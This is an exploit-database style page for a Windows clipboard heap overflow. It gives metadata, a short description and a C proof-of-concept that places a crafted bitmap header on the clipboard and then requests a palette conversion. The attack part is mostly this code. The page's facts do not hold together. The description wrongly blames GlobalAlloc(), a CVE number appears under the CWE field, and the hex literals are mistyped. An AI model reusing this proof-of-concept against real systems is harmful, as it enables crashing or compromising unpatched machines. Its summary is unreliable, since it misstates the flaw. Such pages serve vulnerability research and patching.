header-logo
Suggest Exploit
vendor:
Windows
by:
Ragestorm
9,3
CVSS
CRITICAL
Heap Overflow
119
CWE
Product Name: Windows
Affected Version From: Windows 2000
Affected Version To: Windows Server 2008
Patch Exists: YES
Related CWE: CVE-2008-0081
CPE: o:microsoft:windows
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

GlobalAlloc() Heap Overflow in Windows

A heap overflow vulnerability exists in Windows when using the GlobalAlloc() function. An attacker can exploit this vulnerability by supplying a malicious BITMAPINFOHEADER structure to the GlobalAlloc() function, which can lead to a heap overflow. This vulnerability is tracked by CVE-2008-0081 and is rated as critical with a CVSS score of 9.3.

Mitigation:

Microsoft has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

// source: http://www.ragestorm.net/blogs/?p=255
// source: http://secunia.com/advisories/40870/

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);

Navigation

Suggest Exploit

Services By CQR